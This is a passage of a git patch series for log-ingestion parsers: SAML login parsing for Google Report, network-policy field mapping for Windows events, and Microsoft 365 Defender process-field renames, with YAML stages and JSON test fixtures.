json_event.message.id.applicationName == "vault"}}' + - name: set_saml_fields + filter: '{{ json_event.message.id.applicationName == "saml"}}' - name: set_parameters_fields filter: '{{ json_event.message.events[0].name == "SUSPEND_USER"}}' @@ -258,3 +260,21 @@ stages: {%- endif -%} {% endfor %} {{ types|unique|list }} + + set_saml_fields: + actions: + - set: + event.category: ["authentication"] + device.id: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "device_id" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' + google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' + + - set: + event.type: ["allowed"] + filter: '{{ json_event.message.events[0].name == "login_success"}}' + + - set: + event.type: ["denied"] + event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json new file mode 100644 index 000000000..a96c1fab6 --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success.json @@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:26:15.515000Z", + "cloud": { + "account": { + "id": "C00000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "2.1.3.2" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "2.1.3.2", + "ip": "2.1.3.2" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "10344515534360000000", + "name": "John.doe" + } + } +} \ No newline at end of file diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json new file mode 100644 index 000000000..94e5f299f --- /dev/null +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json @@ -0,0 +1,63 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Google Report", + "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" + } + }, + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + }, + "expected": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", + "event": { + "action": "login_success", + "category": [ + "authentication" + ], + "dataset": "admin#reports#activity", + "type": [ + "allowed" + ] + }, + "@timestamp": "2024-11-07T14:24:58.191000Z", + "cloud": { + "account": { + "id": "C000000000" + } + }, + "google": { + "report": { + "actor": { + "email": "John.doe@test.com" + }, + "saml": { + "application_name": "AWS Client VPN", + "initiator": "sp", + "status_code": "SUCCESS_URI" + } + } + }, + "network": { + "application": "saml" + }, + "related": { + "ip": [ + "8.6.15.1" + ], + "user": [ + "John.doe" + ] + }, + "source": { + "address": "8.6.15.1", + "ip": "8.6.15.1" + }, + "user": { + "domain": "test.com", + "email": "John.doe@test.com", + "id": "113844576558700000000", + "name": "John.doe" + } + } +} \ No newline at end of file From 49f05ead8e481396ef55f2e998ec6f1be38169d0 Mon Sep 17 00:00:00 2001 From: Sebastien Quioc Date: Wed, 13 Nov 2024 16:00:13 +0100 Subject: [PATCH 12/84] feat(Windows): copy CallingStationID as source ip or source mac and copy AuthenticationServer as destination domain --- Windows/windows/ingest/parser.yml | 13 +++++++++++++ Windows/windows/tests/Event_6272.json | 9 +++++++++ Windows/windows/tests/Event_6273.json | 9 +++++++++ Windows/windows/tests/process_6272.json | 13 +++++++++++++ 4 files changed, 44 insertions(+) diff --git a/Windows/windows/ingest/parser.yml b/Windows/windows/ingest/parser.yml index f0bd6640b..c34ff2684 100644 --- a/Windows/windows/ingest/parser.yml +++ b/Windows/windows/ingest/parser.yml @@ -164,6 +164,8 @@ pipeline: - name: dns_fields - name: action_target - name: destination + - name: set_network_policy_fields + filter: "{{ json.event.SourceName == 'Microsoft-Windows-Security-Auditing' and json.event.EventID in [6272, 6273, 6274, 6275, 6276, 6277, 6278, 6279, 6280]}}" - name: rule - name: finalize @@ -1150,6 +1152,17 @@ stages: source.address: "{{json_event.message.SourceAddr}}" filter: "{{json.event.SourceAddr | is_ipaddress}}" + set_network_policy_fields: + actions: + - set: + source.ip: "{{ json.event.CallingStationID }}" + filter: "{{json.event.CallingStationID | is_ipaddress}}" + - set: + source.mac: "{{ json.event.CallingStationID }}" + filter: "{{ final.source.ip == null }}" + - set: + destination.domain: "{{ json.event.AuthenticationServer }}" + rule: actions: - set: diff --git a/Windows/windows/tests/Event_6272.json b/Windows/windows/tests/Event_6272.json index 4a3212af2..20213504d 100644 --- a/Windows/windows/tests/Event_6272.json +++ b/Windows/windows/tests/Event_6272.json @@ -42,6 +42,14 @@ "record_id": 1674356873, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/Event_6273.json b/Windows/windows/tests/Event_6273.json index 8ad5a2226..118cf2445 100644 --- a/Windows/windows/tests/Event_6273.json +++ b/Windows/windows/tests/Event_6273.json @@ -42,6 +42,14 @@ "record_id": 783949626, "type": "Security" }, + "destination": { + "address": "auth.example.org", + "domain": "auth.example.org", + "registered_domain": "example.org", + "size_in_char": 16, + "subdomain": "auth", + "top_level_domain": "org" + }, "host": { "hostname": "hostname.example.org", "name": "hostname.example.org" @@ -63,6 +71,7 @@ }, "related": { "hosts": [ + "auth.example.org", "hostname.example.org" ], "user": [ diff --git a/Windows/windows/tests/process_6272.json b/Windows/windows/tests/process_6272.json index af1d9fe1d..3135f15c9 100644 --- a/Windows/windows/tests/process_6272.json +++ b/Windows/windows/tests/process_6272.json @@ -42,6 +42,11 @@ "record_id": 2324634, "type": "Security" }, + "destination": { + "address": "1.2.3.4", + "domain": "1.2.3.4", + "size_in_char": 7 + }, "host": { "hostname": "test", "name": "test" @@ -63,12 +68,20 @@ }, "related": { "hosts": [ + "1.2.3.4", "test" ], + "ip": [ + "10.24.25.25" + ], "user": [ "testUser" ] }, + "source": { + "address": "10.24.25.25", + "ip": "10.24.25.25" + }, "user": { "domain": "NT01", "id": "S-1-5-21-1111111111-111111111-1111111111-1111", From 7c47ee4ee8a16e39ece3021bd65f19304c722bc8 Mon Sep 17 00:00:00 2001 From: TOUFIKI Zakarya Date: Wed, 13 Nov 2024 16:07:01 +0100 Subject: [PATCH 13/84] Apply linter --- Google Cloud/google-report/_meta/fields.yml | 24 +++++++++---------- Google Cloud/google-report/ingest/parser.yml | 6 ++--- .../tests/test_saml_login_success.json | 4 ++-- .../tests/test_saml_login_success_1.json | 4 ++-- 4 files changed, 19 insertions(+), 19 deletions(-) diff --git a/Google Cloud/google-report/_meta/fields.yml b/Google Cloud/google-report/_meta/fields.yml index ad86f9169..ad9d8d0a7 100644 --- a/Google Cloud/google-report/_meta/fields.yml +++ b/Google Cloud/google-report/_meta/fields.yml @@ -33,14 +33,14 @@ google.report.parameters.visibility: name: google.report.parameters.visibility type: keyword -google.report.token.app_name: - description: Token authorization application name - name: google.report.token.app_name +google.report.saml.application_name: + description: Saml SP application name + name: google.report.saml.application_name type: keyword -google.report.token.type: - description: Token type - name: google.report.token.type +google.report.saml.initiator: + description: SAML requester of saml authentication + name: google.report.saml.initiator type: keyword google.report.saml.status_code: @@ -48,12 +48,12 @@ google.report.saml.status_code: name: google.report.saml.status_code type: keyword -google.report.saml.initiator: - description: SAML requester of saml authentication - name: google.report.saml.initiator +google.report.token.app_name: + description: Token authorization application name + name: google.report.token.app_name type: keyword -google.report.saml.application_name: - description: Saml SP application name - name: google.report.saml.application_name +google.report.token.type: + description: Token type + name: google.report.token.type type: keyword diff --git a/Google Cloud/google-report/ingest/parser.yml b/Google Cloud/google-report/ingest/parser.yml index e00c5ee79..3a0fce88f 100644 --- a/Google Cloud/google-report/ingest/parser.yml +++ b/Google Cloud/google-report/ingest/parser.yml @@ -269,12 +269,12 @@ stages: google.report.saml.status_code: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "saml_status_code" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.initiator: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "initiated_by" %}{{param.value}}{% endif %}{% endfor %}' google.report.saml.application_name: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "application_name" %}{{param.value}}{% endif %}{% endfor %}' - + - set: event.type: ["allowed"] filter: '{{ json_event.message.events[0].name == "login_success"}}' - + - set: event.type: ["denied"] event.reason: '{% for param in json_event.message.events[0].parameters %}{% if param.name == "failure_type" %}{{param.value}}{% endif %}{% endfor %}' - filter: '{{ json_event.message.events[0].name == "login_failure"}}' + filter: '{{ json_event.message.events[0].name == "login_failure"}}' diff --git a/Google Cloud/google-report/tests/test_saml_login_success.json b/Google Cloud/google-report/tests/test_saml_login_success.json index a96c1fab6..8a9785816 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success.json +++ b/Google Cloud/google-report/tests/test_saml_login_success.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:26:15.515Z\",\"uniqueQualifier\":\"4091348940000000\",\"applicationName\":\"saml\",\"customerId\":\"C00000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"10344515534360000000\"},\"ipAddress\":\"2.1.3.2\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/implementation\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", diff --git a/Google Cloud/google-report/tests/test_saml_login_success_1.json b/Google Cloud/google-report/tests/test_saml_login_success_1.json index 94e5f299f..de8e102d7 100644 --- a/Google Cloud/google-report/tests/test_saml_login_success_1.json +++ b/Google Cloud/google-report/tests/test_saml_login_success_1.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", "sekoiaio": { "intake": { "dialect": "Google Report", "dialect_uuid": "04d36706-ee4a-419b-906d-f92f3a46bcdd" } - }, - "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}" + } }, "expected": { "message": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2024-11-07T14:24:58.191Z\",\"uniqueQualifier\":\"-318965716033600000\",\"applicationName\":\"saml\",\"customerId\":\"C000000000\"},\"etag\":\"\\\"M7TKrOH_7SmMcgNyv3m2zFZr0EiRGbeupcJ_yRi3fFQ\\\"\",\"actor\":{\"email\":\"John.doe@test.com\",\"profileId\":\"113844576558700000000\"},\"ipAddress\":\"8.6.15.1\",\"events\":[{\"type\":\"login\",\"name\":\"login_success\",\"parameters\":[{\"name\":\"orgunit_path\",\"value\":\"/test/dev\"},{\"name\":\"initiated_by\",\"value\":\"sp\"},{\"name\":\"application_name\",\"value\":\"AWS Client VPN\"},{\"name\":\"saml_status_code\",\"value\":\"SUCCESS_URI\"}]}]}", From 462382e15fa0254cb24676a97571ed0edadafc82 Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Wed, 13 Nov 2024 16:14:34 +0100 Subject: [PATCH 14/84] Fix/Microsoft 365 Defender: Fix on process* fields --- .../microsoft-365-defender/_meta/fields.yml | 264 ++++++++++-------- .../microsoft-365-defender/ingest/parser.yml | 150 +++++++--- .../tests/test_device_event.json | 22 +- ...test_device_event_sensitive_file_read.json | 100 +++++++ ...vents_2.json => test_device_events_2.json} | 13 +- ...test_device_events_get_clipboard_data.json | 83 ++++++ ...test_device_events_powershell_command.json | 83 ++++++ ..._device_events_shell_link_create_file.json | 103 +++++++ .../tests/test_device_file_event.json | 24 +- .../tests/test_device_file_event_02.json | 109 ++++++++ .../tests/test_device_image_load_event.json | 10 +- .../tests/test_device_logon_events.json | 6 +- .../tests/test_device_network_events.json | 26 +- .../tests/test_device_process_created.json | 8 +- .../tests/test_device_process_events.json | 83 +++--- .../tests/test_device_process_events_2.json | 127 ++++++--- .../tests/test_device_registry_events.json | 24 +- .../test_devices_events_script_content.json | 13 +- .../tests/test_email_events.json | 22 +- .../tests/test_email_post_delivery.json | 2 +- .../tests/test_email_url_info.json | 22 +- .../tests/test_identity_directory.json | 22 +- .../tests/test_identity_info.json | 22 +- .../tests/test_identity_info_2.json | 2 +- .../tests/test_identity_logon.json | 22 +- .../tests/test_identity_query.json | 22 +- .../tests/test_local_ip.json | 22 +- .../tests/test_process_error.json | 54 ++-- 28 files changed, 1068 insertions(+), 392 deletions(-) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_event_sensitive_file_read.json rename Microsoft/microsoft-365-defender/tests/{test_deivce_events_2.json => test_device_events_2.json} (98%) create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_get_clipboard_data.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_powershell_command.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_events_shell_link_create_file.json create mode 100644 Microsoft/microsoft-365-defender/tests/test_device_file_event_02.json diff --git a/Microsoft/microsoft-365-defender/_meta/fields.yml b/Microsoft/microsoft-365-defender/_meta/fields.yml index f69ef372d..0e6154ccd 100644 --- a/Microsoft/microsoft-365-defender/_meta/fields.yml +++ b/Microsoft/microsoft-365-defender/_meta/fields.yml @@ -133,78 +133,6 @@ action.properties.ISP: name: action.properties.ISP type: keyword -action.properties.InitiatingProcessAccountObjectId: - description: Azure AD object ID of the user account that ran the process responsible - for the event - name: action.properties.InitiatingProcessAccountObjectId - type: keyword - -action.properties.InitiatingProcessCommandLine: - description: Process commande Line that initiated the event - name: action.properties.InitiatingProcessCommandLine - type: keyword - -action.properties.InitiatingProcessFileSize: - description: Size of the process (image file) that initiated the event - name: action.properties.InitiatingProcessFileSize - type: long - -action.properties.InitiatingProcessIntegrityLevel: - description: Integrity level of the process that initiated the event. Windows assigns - integrity levels to processes based on certain characteristics, such as if they - were launched from an internet download. These integrity levels influence permissions - to resources - name: action.properties.InitiatingProcessIntegrityLevel - type: keyword - -action.properties.InitiatingProcessLogonId: - description: Identifier for a logon session of the process that initiated the event. - This identifier is unique on the same machine only between restarts. - name: action.properties.InitiatingProcessLogonId - type: keyword - -action.properties.InitiatingProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the process that initiated the event - name: action.properties.InitiatingProcessTokenElevation - type: keyword - -action.properties.InitiatingProcessVersionInfoCompanyName: - description: Company name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoCompanyName - type: keyword - -action.properties.InitiatingProcessVersionInfoFileDescription: - description: Description from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoFileDescription - type: keyword - -action.properties.InitiatingProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoInternalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoOriginalFileName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductName: - description: Product name from the version information of the process (image file) - responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductName - type: keyword - -action.properties.InitiatingProcessVersionInfoProductVersion: - description: Product version from the version information of the process (image - file) responsible for the event - name: action.properties.InitiatingProcessVersionInfoProductVersion - type: keyword - action.properties.IsAdminOperation: description: Indicates whether the activity was performed by an administrator name: action.properties.IsAdminOperation @@ -353,51 +281,6 @@ action.properties.PreviousRegistryValueName: name: action.properties.PreviousRegistryValueName type: keyword -action.properties.ProcessIntegrityLevel: - description: Integrity level of the newly created process. Windows assigns integrity - levels to processes based on certain characteristics, such as if they were launched - from an internet downloaded. These integrity levels influence permissions to resources - name: action.properties.ProcessIntegrityLevel - type: keyword - -action.properties.ProcessTokenElevation: - description: Token type indicating the presence or absence of User Access Control - (UAC) privilege elevation applied to the newly created process - name: action.properties.ProcessTokenElevation - type: keyword - -action.properties.ProcessVersionInfoCompanyName: - description: Company name from the version information of the newly created process - name: action.properties.ProcessVersionInfoCompanyName - type: keyword - -action.properties.ProcessVersionInfoFileDescription: - description: Description from the version information of the newly created process - name: action.properties.ProcessVersionInfoFileDescription - type: keyword - -action.properties.ProcessVersionInfoInternalFileName: - description: Internal file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoInternalFileName - type: keyword - -action.properties.ProcessVersionInfoOriginalFileName: - description: Original file name from the version information of the newly created - process - name: action.properties.ProcessVersionInfoOriginalFileName - type: keyword - -action.properties.ProcessVersionInfoProductName: - description: Product name from the version information of the newly created process - name: action.properties.ProcessVersionInfoProductName - type: keyword - -action.properties.ProcessVersionInfoProductVersion: - description: Product version from the version information of the newly created process - name: action.properties.ProcessVersionInfoProductVersion - type: keyword - action.properties.Query: description: String used to run the query name: action.properties.Query @@ -529,6 +412,143 @@ action.properties.UserLevelPolicy: name: action.properties.UserLevelPolicy type: keyword +action.properties.process.AccountObjectId: + description: Azure AD object ID of the user account that ran the process responsible + for the event + name: action.properties.process.AccountObjectId + type: keyword + +action.properties.process.CommandLine: + description: Process commande Line that initiated the event + name: action.properties.process.CommandLine + type: keyword + +action.properties.process.FileSize: + description: Size of the process (image file) that initiated the event + name: action.properties.process.FileSize + type: long + +action.properties.process.IntegrityLevel: + description: Integrity level of the newly created process. Windows assigns integrity + levels to processes based on certain characteristics, such as if they were launched + from an internet downloaded. These integrity levels influence permissions to resources + name: action.properties.process.IntegrityLevel + type: keyword + +action.properties.process.LogonId: + description: Identifier for a logon session of the process that initiated the event. + This identifier is unique on the same machine only between restarts. + name: action.properties.process.LogonId + type: keyword + +action.properties.process.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the newly created process + name: action.properties.process.TokenElevation + type: keyword + +action.properties.process.VersionInfoCompanyName: + description: Company name from the version information of the newly created process + name: action.properties.process.VersionInfoCompanyName + type: keyword + +action.properties.process.VersionInfoFileDescription: + description: Description from the version information of the newly created process + name: action.properties.process.VersionInfoFileDescription + type: keyword + +action.properties.process.VersionInfoInternalFileName: + description: Internal file name from the version information of the newly created + process + name: action.properties.process.VersionInfoInternalFileName + type: keyword + +action.properties.process.VersionInfoOriginalFileName: + description: Original file name from the version information of the newly created + process + name: action.properties.process.VersionInfoOriginalFileName + type: keyword + +action.properties.process.VersionInfoProductName: + description: Product name from the version information of the newly created process + name: action.properties.process.VersionInfoProductName + type: keyword + +action.properties.process.VersionInfoProductVersion: + description: Product version from the version information of the newly created process + name: action.properties.process.VersionInfoProductVersion + type: keyword + +action.properties.process.parent.AccountObjectId: + description: Azure AD object ID of the user account that ran the parent process + responsible for the event + name: action.properties.process.parent.AccountObjectId + type: keyword + +action.properties.process.parent.CommandLine: + description: Parent process commande Line that initiated the event + name: action.properties.process.parent.CommandLine + type: keyword + +action.properties.process.parent.FileSize: + description: Size of the parent process (image file) that initiated the event + name: action.properties.process.parent.FileSize + type: long + +action.properties.process.parent.IntegrityLevel: + description: Integrity level of the parent process that initiated the event. Windows + assigns integrity levels to processes based on certain characteristics, such as + if they were launched from an internet download. These integrity levels influence + permissions to resources + name: action.properties.process.parent.IntegrityLevel + type: keyword + +action.properties.process.parent.LogonId: + description: Identifier for a logon session of the parent process that initiated + the event. This identifier is unique on the same machine only between restarts. + name: action.properties.process.parent.LogonId + type: keyword + +action.properties.process.parent.TokenElevation: + description: Token type indicating the presence or absence of User Access Control + (UAC) privilege elevation applied to the parent process that initiated the event + name: action.properties.process.parent.TokenElevation + type: keyword + +action.properties.process.parent.VersionInfoCompanyName: + description: Company name from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoCompanyName + type: keyword + +action.properties.process.parent.VersionInfoFileDescription: + description: Description from the version information of the parent process (image + file) responsible for the event + name: action.properties.process.parent.VersionInfoFileDescription + type: keyword + +action.properties.process.parent.VersionInfoInternalFileName: + description: Internal file name from the version information of the parent process + (image file) responsible for the event + name: action.properties.process.parent.VersionInfoInternalFileName + type: keyword + +action.properties.process.parent.VersionInfoOriginalFileName: + description: '' + name: action.properties.process.parent.VersionInfoOriginalFileName + type: keyword + +action.properties.process.parent.VersionInfoProductName: + description: '' + name: action.properties.process.parent.VersionInfoProductName + type: keyword + +action.properties.process.parent.VersionInfoProductVersion: + description: Product version from the version information of the parent process + (image file) responsible for the event + name: action.properties.process.parent.VersionInfoProductVersion + type: keyword + email.direction: description: The direction of the message based on the sending and receiving domains name: email.direction @@ -821,6 +841,16 @@ microsoft.defender.threat.types: name: microsoft.defender.threat.types type: keyword +process.parent.user.domain: + description: '' + name: process.parent.user.domain + type: keyword + +process.parent.user.email: + description: '' + name: process.parent.user.email + type: keyword + process.user.domain: description: Domain of the account that ran the process responsible for the event name: process.user.domain diff --git a/Microsoft/microsoft-365-defender/ingest/parser.yml b/Microsoft/microsoft-365-defender/ingest/parser.yml index 2a8b6655f..f60d9b6f0 100644 --- a/Microsoft/microsoft-365-defender/ingest/parser.yml +++ b/Microsoft/microsoft-365-defender/ingest/parser.yml @@ -40,6 +40,10 @@ pipeline: input_field: "{{json_event.message.properties.RawEventData.Data}}" output_field: "data" - name: set_common_fields + - name: set_process_events + filter: '{{json_event.message.get("category") not in ["AdvancedHunting-DeviceProcessEvents", "AdvancedHunting-DeviceEvents"] or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", "appguardbrowsetourl", "appguardcreatecontainer", "appguardlaunchedwithurl", "appguardresumecontainer", "auditpolicymodification", "browserlaunchedtoopenurl", "clrunbackedmoduleloaded", "controlflowguardviolation", "createremotethreadapicall", "dnsqueryresponse", "dpapiaccessed", "exploitguardacgenforced", "exploitguardwin32systemcallblocked", "getasynckeystateapicall", "getclipboarddata", "ldapsearch", "memoryremoteprotect", "namedpipeevent", "ntallocatevirtualmemoryapicall", "ntallocatevirtualmemoryremoteapicall", "ntmapviewofsectionremoteapicall", "ntprotectvirtualmemoryapicall","otheralertrelatedactivity", "powershellcommand", "processprimarytokenmodified", "screenshottaken", "smartscreenurlwarning", "writetolsassprocessmemory"])}}' + - name: set_process_deviceprocess_events + filter: '{{json_event.message.get("category") == "AdvancedHunting-DeviceProcessEvents" or (json_event.message.get("category") == "AdvancedHunting-DeviceEvents" and json_event.message.properties.get("ActionType").lower() not in ["antivirusscancancelled", "antivirusscancompleted", "antivirusscanfailed", "appcontrolpolicyapplied", 